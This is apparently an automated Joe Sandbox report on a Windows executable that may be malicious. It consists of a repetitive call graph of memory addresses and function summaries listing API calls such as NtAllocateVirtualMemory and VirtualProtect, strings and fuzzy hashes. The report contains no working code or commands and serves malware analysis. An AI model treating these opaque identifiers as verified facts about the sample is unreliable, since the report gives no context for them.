7ff6cd201394 2 API calls 3566->3568 3569 
7ff6cd201394 2 API calls 3567->3569 3568->3567 3570 7ff6cd20154e 3569->3570 3571 7ff6cd201394 2 API calls 3570->3571 3572 7ff6cd201558 3571->3572 3573 7ff6cd20155d 3572->3573 3574 7ff6cd201394 2 API calls 3572->3574 3575 7ff6cd201394 2 API calls 3573->3575 3574->3573 3576 7ff6cd201567 3575->3576 3577 7ff6cd20156c 3576->3577 3578 7ff6cd201394 2 API calls 3576->3578 3579 7ff6cd201394 2 API calls 3577->3579 3578->3577 3580 7ff6cd201576 3579->3580 3581 7ff6cd20157b 3580->3581 3582 7ff6cd201394 2 API calls 3580->3582 3583 7ff6cd201394 2 API calls 3581->3583 3582->3581 3584 7ff6cd201585 3583->3584 3585 7ff6cd20158a 3584->3585 3586 7ff6cd201394 2 API calls 3584->3586 3587 7ff6cd201394 2 API calls 3585->3587 3586->3585 3588 7ff6cd201599 3587->3588 3589 7ff6cd201394 2 API calls 3588->3589 3590 7ff6cd2015a3 3589->3590 3591 7ff6cd2015a8 3590->3591 3592 7ff6cd201394 2 API calls 3590->3592 3593 7ff6cd201394 2 API calls 3591->3593 3592->3591 3594 7ff6cd2015b7 3593->3594 3595 7ff6cd201394 2 API calls 3594->3595 3596 7ff6cd2015c1 3595->3596 3597 7ff6cd2015c6 3596->3597 3598 7ff6cd201394 2 API calls 3596->3598 3599 7ff6cd201394 2 API calls 3597->3599 3598->3597 3600 7ff6cd2015d0 3599->3600 3601 7ff6cd2015d5 3600->3601 3602 7ff6cd201394 2 API calls 3600->3602 3603 7ff6cd201394 2 API calls 3601->3603 3602->3601 3604 7ff6cd2015df 3603->3604 3605 7ff6cd2015e4 3604->3605 3606 7ff6cd201394 2 API calls 3604->3606 3607 7ff6cd201394 2 API calls 3605->3607 3606->3605 3608 7ff6cd2015f3 3607->3608 3608->3050 3610 7ff6cd201394 2 API calls 3609->3610 3611 7ff6cd201585 3610->3611 3612 7ff6cd20158a 3611->3612 3613 7ff6cd201394 2 API calls 3611->3613 3614 7ff6cd201394 2 API calls 3612->3614 3613->3612 3615 7ff6cd201599 3614->3615 3616 7ff6cd201394 2 API calls 3615->3616 3617 7ff6cd2015a3 3616->3617 3618 7ff6cd2015a8 3617->3618 3619 7ff6cd201394 2 API calls 3617->3619 3620 7ff6cd201394 2 API calls 3618->3620 3619->3618 3621 7ff6cd2015b7 3620->3621 3622 7ff6cd201394 2 API calls 3621->3622 3623 
7ff6cd2015c1 3622->3623 3624 7ff6cd2015c6 3623->3624 3625 7ff6cd201394 2 API calls 3623->3625 3626 7ff6cd201394 2 API calls 3624->3626 3625->3624 3627 7ff6cd2015d0 3626->3627 3628 7ff6cd2015d5 3627->3628 3629 7ff6cd201394 2 API calls 3627->3629 3630 7ff6cd201394 2 API calls 3628->3630 3629->3628 3631 7ff6cd2015df 3630->3631 3632 7ff6cd2015e4 3631->3632 3633 7ff6cd201394 2 API calls 3631->3633 3634 7ff6cd201394 2 API calls 3632->3634 3633->3632 3635 7ff6cd2015f3 3634->3635 3635->3058 3636 7ff6cd20158a 3635->3636 3637 7ff6cd201394 2 API calls 3636->3637 3638 7ff6cd201599 3637->3638 3639 7ff6cd201394 2 API calls 3638->3639 3640 7ff6cd2015a3 3639->3640 3641 7ff6cd2015a8 3640->3641 3642 7ff6cd201394 2 API calls 3640->3642 3643 7ff6cd201394 2 API calls 3641->3643 3642->3641 3644 7ff6cd2015b7 3643->3644 3645 7ff6cd201394 2 API calls 3644->3645 3646 7ff6cd2015c1 3645->3646 3647 7ff6cd2015c6 3646->3647 3648 7ff6cd201394 2 API calls 3646->3648 3649 7ff6cd201394 2 API calls 3647->3649 3648->3647 3650 7ff6cd2015d0 3649->3650 3651 7ff6cd2015d5 3650->3651 3652 7ff6cd201394 2 API calls 3650->3652 3653 7ff6cd201394 2 API calls 3651->3653 3652->3651 3654 7ff6cd2015df 3653->3654 3655 7ff6cd2015e4 3654->3655 3656 7ff6cd201394 2 API calls 3654->3656 3657 7ff6cd201394 2 API calls 3655->3657 3656->3655 3658 7ff6cd2015f3 3657->3658 3658->3058 3660 7ff6cd201394 2 API calls 3659->3660 3661 7ff6cd2015f3 3660->3661 3661->3063 3663 7ff6cd201394 2 API calls 3662->3663 3664 7ff6cd2015b7 3663->3664 3665 7ff6cd201394 2 API calls 3664->3665 3666 7ff6cd2015c1 3665->3666 3667 7ff6cd2015c6 3666->3667 3668 7ff6cd201394 2 API calls 3666->3668 3669 7ff6cd201394 2 API calls 3667->3669 3668->3667 3670 7ff6cd2015d0 3669->3670 3671 7ff6cd2015d5 3670->3671 3672 7ff6cd201394 2 API calls 3670->3672 3673 7ff6cd201394 2 API calls 3671->3673 3672->3671 3674 7ff6cd2015df 3673->3674 3675 7ff6cd2015e4 3674->3675 3676 7ff6cd201394 2 API calls 3674->3676 3677 7ff6cd201394 2 API calls 3675->3677 3676->3675 3678 
7ff6cd2015f3 3677->3678 3678->3081 3678->3082 3680 7ff6cd201394 2 API calls 3679->3680 3681 7ff6cd20153a 3680->3681 3682 7ff6cd20153f 3681->3682 3683 7ff6cd201394 2 API calls 3681->3683 3684 7ff6cd201394 2 API calls 3682->3684 3683->3682 3685 7ff6cd20154e 3684->3685 3686 7ff6cd201394 2 API calls 3685->3686 3687 7ff6cd201558 3686->3687 3688 7ff6cd20155d 3687->3688 3689 7ff6cd201394 2 API calls 3687->3689 3690 7ff6cd201394 2 API calls 3688->3690 3689->3688 3691 7ff6cd201567 3690->3691 3692 7ff6cd20156c 3691->3692 3693 7ff6cd201394 2 API calls 3691->3693 3694 7ff6cd201394 2 API calls 3692->3694 3693->3692 3695 7ff6cd201576 3694->3695 3696 7ff6cd20157b 3695->3696 3697 7ff6cd201394 2 API calls 3695->3697 3698 7ff6cd201394 2 API calls 3696->3698 3697->3696 3699 7ff6cd201585 3698->3699 3700 7ff6cd20158a 3699->3700 3701 7ff6cd201394 2 API calls 3699->3701 3702 7ff6cd201394 2 API calls 3700->3702 3701->3700 3703 7ff6cd201599 3702->3703 3704 7ff6cd201394 2 API calls 3703->3704 3705 7ff6cd2015a3 3704->3705 3706 7ff6cd2015a8 3705->3706 3707 7ff6cd201394 2 API calls 3705->3707 3708 7ff6cd201394 2 API calls 3706->3708 3707->3706 3709 7ff6cd2015b7 3708->3709 3710 7ff6cd201394 2 API calls 3709->3710 3711 7ff6cd2015c1 3710->3711 3712 7ff6cd2015c6 3711->3712 3713 7ff6cd201394 2 API calls 3711->3713 3714 7ff6cd201394 2 API calls 3712->3714 3713->3712 3715 7ff6cd2015d0 3714->3715 3716 7ff6cd2015d5 3715->3716 3717 7ff6cd201394 2 API calls 3715->3717 3718 7ff6cd201394 2 API calls 3716->3718 3717->3716 3719 7ff6cd2015df 3718->3719 3720 7ff6cd2015e4 3719->3720 3721 7ff6cd201394 2 API calls 3719->3721 3722 7ff6cd201394 2 API calls 3720->3722 3721->3720 3723 7ff6cd2015f3 3722->3723 3723->3105 3723->3106 3725 7ff6cd201394 2 API calls 3724->3725 3726 7ff6cd2014b3 3725->3726 3727 7ff6cd2014b8 3726->3727 3728 7ff6cd201394 2 API calls 3726->3728 3729 7ff6cd201394 2 API calls 3727->3729 3728->3727 3730 7ff6cd2014c2 3729->3730 3731 7ff6cd2014c7 3730->3731 3732 7ff6cd201394 2 API calls 3730->3732 
3733 7ff6cd201394 2 API calls 3731->3733 3732->3731 3734 7ff6cd2014d6 3733->3734 3735 7ff6cd201394 2 API calls 3734->3735 3736 7ff6cd2014e0 3735->3736 3737 7ff6cd2014e5 3736->3737 3738 7ff6cd201394 2 API calls 3736->3738 3739 7ff6cd201394 2 API calls 3737->3739 3738->3737 3740 7ff6cd2014ef 3739->3740 3741 7ff6cd2014f4 3740->3741 3742 7ff6cd201394 2 API calls 3740->3742 3743 7ff6cd201394 2 API calls 3741->3743 3742->3741 3744 7ff6cd2014fe 3743->3744 3745 7ff6cd201394 2 API calls 3744->3745 3746 7ff6cd201503 3745->3746 3747 7ff6cd201394 2 API calls 3746->3747 3748 7ff6cd201512 3747->3748 3749 7ff6cd201394 2 API calls 3748->3749 3750 7ff6cd201521 3749->3750 3751 7ff6cd201530 3750->3751 3752 7ff6cd201394 2 API calls 3750->3752 3753 7ff6cd201394 2 API calls 3751->3753 3752->3751 3754 7ff6cd20153a 3753->3754 3755 7ff6cd20153f 3754->3755 3756 7ff6cd201394 2 API calls 3754->3756 3757 7ff6cd201394 2 API calls 3755->3757 3756->3755 3758 7ff6cd20154e 3757->3758 3759 7ff6cd201394 2 API calls 3758->3759 3760 7ff6cd201558 3759->3760 3761 7ff6cd20155d 3760->3761 3762 7ff6cd201394 2 API calls 3760->3762 3763 7ff6cd201394 2 API calls 3761->3763 3762->3761 3764 7ff6cd201567 3763->3764 3765 7ff6cd20156c 3764->3765 3766 7ff6cd201394 2 API calls 3764->3766 3767 7ff6cd201394 2 API calls 3765->3767 3766->3765 3768 7ff6cd201576 3767->3768 3769 7ff6cd20157b 3768->3769 3770 7ff6cd201394 2 API calls 3768->3770 3771 7ff6cd201394 2 API calls 3769->3771 3770->3769 3772 7ff6cd201585 3771->3772 3773 7ff6cd20158a 3772->3773 3774 7ff6cd201394 2 API calls 3772->3774 3775 7ff6cd201394 2 API calls 3773->3775 3774->3773 3776 7ff6cd201599 3775->3776 3777 7ff6cd201394 2 API calls 3776->3777 3778 7ff6cd2015a3 3777->3778 3779 7ff6cd2015a8 3778->3779 3780 7ff6cd201394 2 API calls 3778->3780 3781 7ff6cd201394 2 API calls 3779->3781 3780->3779 3782 7ff6cd2015b7 3781->3782 3783 7ff6cd201394 2 API calls 3782->3783 3784 7ff6cd2015c1 3783->3784 3785 7ff6cd2015c6 3784->3785 3786 7ff6cd201394 2 API calls 3784->3786 
3787 7ff6cd201394 2 API calls 3785->3787 3786->3785 3788 7ff6cd2015d0 3787->3788 3789 7ff6cd2015d5 3788->3789 3790 7ff6cd201394 2 API calls 3788->3790 3791 7ff6cd201394 2 API calls 3789->3791 3790->3789 3792 7ff6cd2015df 3791->3792 3793 7ff6cd2015e4 3792->3793 3794 7ff6cd201394 2 API calls 3792->3794 3795 7ff6cd201394 2 API calls 3793->3795 3794->3793 3796 7ff6cd2015f3 3795->3796 3796->3115 3797 7ff6cd201440 3796->3797 3798 7ff6cd201394 2 API calls 3797->3798 3799 7ff6cd20144f 3798->3799 3800 7ff6cd201394 2 API calls 3799->3800 3801 7ff6cd201459 3800->3801 3802 7ff6cd20145e 3801->3802 3803 7ff6cd201394 2 API calls 3801->3803 3804 7ff6cd201394 2 API calls 3802->3804 3803->3802 3805 7ff6cd201468 3804->3805 3806 7ff6cd20146d 3805->3806 3807 7ff6cd201394 2 API calls 3805->3807 3808 7ff6cd201394 2 API calls 3806->3808 3807->3806 3809 7ff6cd201477 3808->3809 3810 7ff6cd20147c 3809->3810 3811 7ff6cd201394 2 API calls 3809->3811 3812 7ff6cd201394 2 API calls 3810->3812 3811->3810 3813 7ff6cd201486 3812->3813 3814 7ff6cd20148b 3813->3814 3815 7ff6cd201394 2 API calls 3813->3815 3816 7ff6cd201394 2 API calls 3814->3816 3815->3814 3817 7ff6cd201495 3816->3817 3818 7ff6cd20149a 3817->3818 3819 7ff6cd201394 2 API calls 3817->3819 3820 7ff6cd201394 2 API calls 3818->3820 3819->3818 3821 7ff6cd2014a4 3820->3821 3822 7ff6cd2014a9 3821->3822 3823 7ff6cd201394 2 API calls 3821->3823 3824 7ff6cd201394 2 API calls 3822->3824 3823->3822 3825 7ff6cd2014b3 3824->3825 3826 7ff6cd2014b8 3825->3826 3827 7ff6cd201394 2 API calls 3825->3827 3828 7ff6cd201394 2 API calls 3826->3828 3827->3826 3829 7ff6cd2014c2 3828->3829 3830 7ff6cd2014c7 3829->3830 3831 7ff6cd201394 2 API calls 3829->3831 3832 7ff6cd201394 2 API calls 3830->3832 3831->3830 3833 7ff6cd2014d6 3832->3833 3834 7ff6cd201394 2 API calls 3833->3834 3835 7ff6cd2014e0 3834->3835 3836 7ff6cd2014e5 3835->3836 3837 7ff6cd201394 2 API calls 3835->3837 3838 7ff6cd201394 2 API calls 3836->3838 3837->3836 3839 7ff6cd2014ef 3838->3839 3840 
7ff6cd2014f4 3839->3840 3841 7ff6cd201394 2 API calls 3839->3841 3842 7ff6cd201394 2 API calls 3840->3842 3841->3840 3843 7ff6cd2014fe 3842->3843 3844 7ff6cd201394 2 API calls 3843->3844 3845 7ff6cd201503 3844->3845 3846 7ff6cd201394 2 API calls 3845->3846 3847 7ff6cd201512 3846->3847 3848 7ff6cd201394 2 API calls 3847->3848 3849 7ff6cd201521 3848->3849 3850 7ff6cd201530 3849->3850 3851 7ff6cd201394 2 API calls 3849->3851 3852 7ff6cd201394 2 API calls 3850->3852 3851->3850 3853 7ff6cd20153a 3852->3853 3854 7ff6cd20153f 3853->3854 3855 7ff6cd201394 2 API calls 3853->3855 3856 7ff6cd201394 2 API calls 3854->3856 3855->3854 3857 7ff6cd20154e 3856->3857 3858 7ff6cd201394 2 API calls 3857->3858 3859 7ff6cd201558 3858->3859 3860 7ff6cd20155d 3859->3860 3861 7ff6cd201394 2 API calls 3859->3861 3862 7ff6cd201394 2 API calls 3860->3862 3861->3860 3863 7ff6cd201567 3862->3863 3864 7ff6cd20156c 3863->3864 3865 7ff6cd201394 2 API calls 3863->3865 3866 7ff6cd201394 2 API calls 3864->3866 3865->3864 3867 7ff6cd201576 3866->3867 3868 7ff6cd20157b 3867->3868 3869 7ff6cd201394 2 API calls 3867->3869 3870 7ff6cd201394 2 API calls 3868->3870 3869->3868 3871 7ff6cd201585 3870->3871 3872 7ff6cd20158a 3871->3872 3873 7ff6cd201394 2 API calls 3871->3873 3874 7ff6cd201394 2 API calls 3872->3874 3873->3872 3875 7ff6cd201599 3874->3875 3876 7ff6cd201394 2 API calls 3875->3876 3877 7ff6cd2015a3 3876->3877 3878 7ff6cd2015a8 3877->3878 3879 7ff6cd201394 2 API calls 3877->3879 3880 7ff6cd201394 2 API calls 3878->3880 3879->3878 3881 7ff6cd2015b7 3880->3881 3882 7ff6cd201394 2 API calls 3881->3882 3883 7ff6cd2015c1 3882->3883 3884 7ff6cd2015c6 3883->3884 3885 7ff6cd201394 2 API calls 3883->3885 3886 7ff6cd201394 2 API calls 3884->3886 3885->3884 3887 7ff6cd2015d0 3886->3887 3888 7ff6cd2015d5 3887->3888 3889 7ff6cd201394 2 API calls 3887->3889 3890 7ff6cd201394 2 API calls 3888->3890 3889->3888 3891 7ff6cd2015df 3890->3891 3892 7ff6cd2015e4 3891->3892 3893 7ff6cd201394 2 API calls 3891->3893 3894 
7ff6cd201394 2 API calls 3892->3894 3893->3892 3895 7ff6cd2015f3 3894->3895 3895->3115 3895->3126 3897 7ff6cd2035c1 memset 3896->3897 3907 7ff6cd2033c3 3896->3907 3899 7ff6cd2035e6 3897->3899 3898 7ff6cd20343a memset 3898->3907 3900 7ff6cd20362b wcscpy wcscat wcslen 3899->3900 3901 7ff6cd201422 2 API calls 3900->3901 3903 7ff6cd203728 3901->3903 3902 7ff6cd203493 wcscpy wcscat wcslen 4241 7ff6cd201422 3902->4241 3905 7ff6cd203767 3903->3905 4348 7ff6cd201431 3903->4348 3912 7ff6cd2014c7 3905->3912 3907->3897 3907->3898 3907->3902 3909 7ff6cd20145e 2 API calls 3907->3909 3911 7ff6cd203579 3907->3911 3909->3907 3910 7ff6cd20145e 2 API calls 3910->3905 3911->3897 3913 7ff6cd201394 2 API calls 3912->3913 3914 7ff6cd2014d6 3913->3914 3915 7ff6cd201394 2 API calls 3914->3915 3916 7ff6cd2014e0 3915->3916 3917 7ff6cd2014e5 3916->3917 3918 7ff6cd201394 2 API calls 3916->3918 3919 7ff6cd201394 2 API calls 3917->3919 3918->3917 3920 7ff6cd2014ef 3919->3920 3921 7ff6cd2014f4 3920->3921 3922 7ff6cd201394 2 API calls 3920->3922 3923 7ff6cd201394 2 API calls 3921->3923 3922->3921 3924 7ff6cd2014fe 3923->3924 3925 7ff6cd201394 2 API calls 3924->3925 3926 7ff6cd201503 3925->3926 3927 7ff6cd201394 2 API calls 3926->3927 3928 7ff6cd201512 3927->3928 3929 7ff6cd201394 2 API calls 3928->3929 3930 7ff6cd201521 3929->3930 3931 7ff6cd201530 3930->3931 3932 7ff6cd201394 2 API calls 3930->3932 3933 7ff6cd201394 2 API calls 3931->3933 3932->3931 3934 7ff6cd20153a 3933->3934 3935 7ff6cd20153f 3934->3935 3936 7ff6cd201394 2 API calls 3934->3936 3937 7ff6cd201394 2 API calls 3935->3937 3936->3935 3938 7ff6cd20154e 3937->3938 3939 7ff6cd201394 2 API calls 3938->3939 3940 7ff6cd201558 3939->3940 3941 7ff6cd20155d 3940->3941 3942 7ff6cd201394 2 API calls 3940->3942 3943 7ff6cd201394 2 API calls 3941->3943 3942->3941 3944 7ff6cd201567 3943->3944 3945 7ff6cd20156c 3944->3945 3946 7ff6cd201394 2 API calls 3944->3946 3947 7ff6cd201394 2 API calls 3945->3947 3946->3945 3948 7ff6cd201576 3947->3948 3949 
7ff6cd20157b 3948->3949 3950 7ff6cd201394 2 API calls 3948->3950 3951 7ff6cd201394 2 API calls 3949->3951 3950->3949 3952 7ff6cd201585 3951->3952 3953 7ff6cd20158a 3952->3953 3954 7ff6cd201394 2 API calls 3952->3954 3955 7ff6cd201394 2 API calls 3953->3955 3954->3953 3956 7ff6cd201599 3955->3956 3957 7ff6cd201394 2 API calls 3956->3957 3958 7ff6cd2015a3 3957->3958 3959 7ff6cd2015a8 3958->3959 3960 7ff6cd201394 2 API calls 3958->3960 3961 7ff6cd201394 2 API calls 3959->3961 3960->3959 3962 7ff6cd2015b7 3961->3962 3963 7ff6cd201394 2 API calls 3962->3963 3964 7ff6cd2015c1 3963->3964 3965 7ff6cd2015c6 3964->3965 3966 7ff6cd201394 2 API calls 3964->3966 3967 7ff6cd201394 2 API calls 3965->3967 3966->3965 3968 7ff6cd2015d0 3967->3968 3969 7ff6cd2015d5 3968->3969 3970 7ff6cd201394 2 API calls 3968->3970 3971 7ff6cd201394 2 API calls 3969->3971 3970->3969 3972 7ff6cd2015df 3971->3972 3973 7ff6cd2015e4 3972->3973 3974 7ff6cd201394 2 API calls 3972->3974 3975 7ff6cd201394 2 API calls 3973->3975 3974->3973 3976 7ff6cd2015f3 3975->3976 3976->3142 3978 7ff6cd202f88 3977->3978 3979 7ff6cd2014a9 2 API calls 3978->3979 3980 7ff6cd202fd0 3979->3980 3980->3116 3982 7ff6cd202690 10 API calls 3981->3982 3983 7ff6cd20391e 3982->3983 3984 7ff6cd203b21 3983->3984 3985 7ff6cd2014a9 2 API calls 3983->3985 3984->3127 3986 7ff6cd203967 3985->3986 3987 7ff6cd203b28 3986->3987 4451 7ff6cd2014b8 3986->4451 4770 7ff6cd2015c6 3987->4770 3990 7ff6cd203a87 memset 4527 7ff6cd20148b 3990->4527 3992 7ff6cd2014b8 2 API calls 3994 7ff6cd20398f 3992->3994 3994->3990 3994->3992 4520 7ff6cd2015d5 3994->4520 3998 7ff6cd2014b8 2 API calls 3999 7ff6cd203b07 3998->3999 3999->3987 4000 7ff6cd203b0b 3999->4000 4685 7ff6cd20147c 4000->4685 4003 7ff6cd20145e 2 API calls 4003->3984 4005 7ff6cd208420 malloc 4004->4005 4006 7ff6cd2013b8 4005->4006 4007 7ff6cd2013c6 NtAllocateVirtualMemory 4006->4007 4007->3183 4009 7ff6cd20266f 4008->4009 4009->3399 4009->4009 4092 7ff6cd20155d 4010->4092 4012 7ff6cd2027f4 4013 

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                • String ID:
                                                                • API String ID: 2643109117-0
                                                                • Opcode ID: 0e6ca4d89b91c9777d4e8bda24571358cd04216e07cbc33493341518a02b717e
                                                                • Instruction ID: 38451f2913a93e2538cdfbae5ff0914704be7a6ef296a6c8b9ee48a9a35de105
                                                                • Opcode Fuzzy Hash: 0e6ca4d89b91c9777d4e8bda24571358cd04216e07cbc33493341518a02b717e
                                                                • Instruction Fuzzy Hash: 4A512135B09A8685F615AF15DAA037A67A1BF447C2F449036DBAEC73A2FF2CB4418341

                                                                Control-flow Graph

                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6CD201156), ref: 00007FF6CD2013F7
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: df5726f17078ab6ac065199cd3050d17cfa55e7702da03f535898b72b5525225
                                                                • Instruction ID: 6723c40dec50580138cb98a2a9d63c584b397f0a4c56af7f67b01f64ca11c689
                                                                • Opcode Fuzzy Hash: df5726f17078ab6ac065199cd3050d17cfa55e7702da03f535898b72b5525225
                                                                • Instruction Fuzzy Hash: ABF0B671A18B8582E624DF51F96012A77A1FB48381F009935EBEC82725EF3CE0508B40

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscatwcscpywcslen
                                                                • String ID: $0$0$@$@
                                                                • API String ID: 4263182637-1413854666
                                                                • Opcode ID: 7cd9da10e5ba8d0aa83ba8a4f986f40fee152bd6249f645e56411cb3be7ace2c
                                                                • Instruction ID: 0837d0a9f03267c36f7f9e94df1a6da28e68d19186310f74c6661f452a6ce648
                                                                • Opcode Fuzzy Hash: 7cd9da10e5ba8d0aa83ba8a4f986f40fee152bd6249f645e56411cb3be7ace2c
                                                                • Instruction Fuzzy Hash: B5B17231A1CAC199E3218F14E8953ABB7A0FF84385F404136EBD9D6AA6EF7DE145C740

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                • String ID: 0$X$`
                                                                • API String ID: 329590056-2527496196
                                                                • Opcode ID: dfb1ef97c4b937f6efb939c327d78c634eb2d4bb8dd394944f45c74ac543e4e5
                                                                • Instruction ID: bb57163cc0df4ca32a03c92a88d4f7dfa6895fde2e7aa567bd75a215e70bf323
                                                                • Opcode Fuzzy Hash: dfb1ef97c4b937f6efb939c327d78c634eb2d4bb8dd394944f45c74ac543e4e5
                                                                • Instruction Fuzzy Hash: 48026932A09BC185E7218F15E8543AA77A0FB847A5F404236DBED877A6EF3CE185C740

                                                                Control-flow Graph

                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF6CD20A4A0,00007FF6CD20A4A0,?,?,00007FF6CD200000,?,00007FF6CD201991), ref: 00007FF6CD201C63
                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF6CD20A4A0,00007FF6CD20A4A0,?,?,00007FF6CD200000,?,00007FF6CD201991), ref: 00007FF6CD201CC7
                                                                • memcpy.MSVCRT ref: 00007FF6CD201CE0
                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF6CD20A4A0,00007FF6CD20A4A0,?,?,00007FF6CD200000,?,00007FF6CD201991), ref: 00007FF6CD201D23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                • API String ID: 2595394609-2123141913
                                                                • Opcode ID: 4fcf98ada4743885cf4745be06d9b2b7b53b0b14eeec15d9d77e2cd9606d3f89
                                                                • Instruction ID: 99da061c42f8e447c9d09071ff584f8b0cd9199745c8e0abb41da45a9ac43063
                                                                • Opcode Fuzzy Hash: 4fcf98ada4743885cf4745be06d9b2b7b53b0b14eeec15d9d77e2cd9606d3f89
                                                                • Instruction Fuzzy Hash: 31419E71B09A8281EA569F01D9A46B927A0FB44BC6F554133DFAEC33A1EE3CF541C341

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                • String ID:
                                                                • API String ID: 3326252324-0
                                                                • Opcode ID: 5bee38b4a5a680de8b18f3cd75628340502d90423a1d8ff5dcf8a878582094de
                                                                • Instruction ID: 9c48619c3f8990ed721303d4eebf6dab1a7186c274d1fefcd035859f034e6cb8
                                                                • Opcode Fuzzy Hash: 5bee38b4a5a680de8b18f3cd75628340502d90423a1d8ff5dcf8a878582094de
                                                                • Instruction Fuzzy Hash: 4421D031B1998296F6559F41DAA03766260BF54BD6F844032CBAEC7AA5FF2CB8468340

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmp
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID:
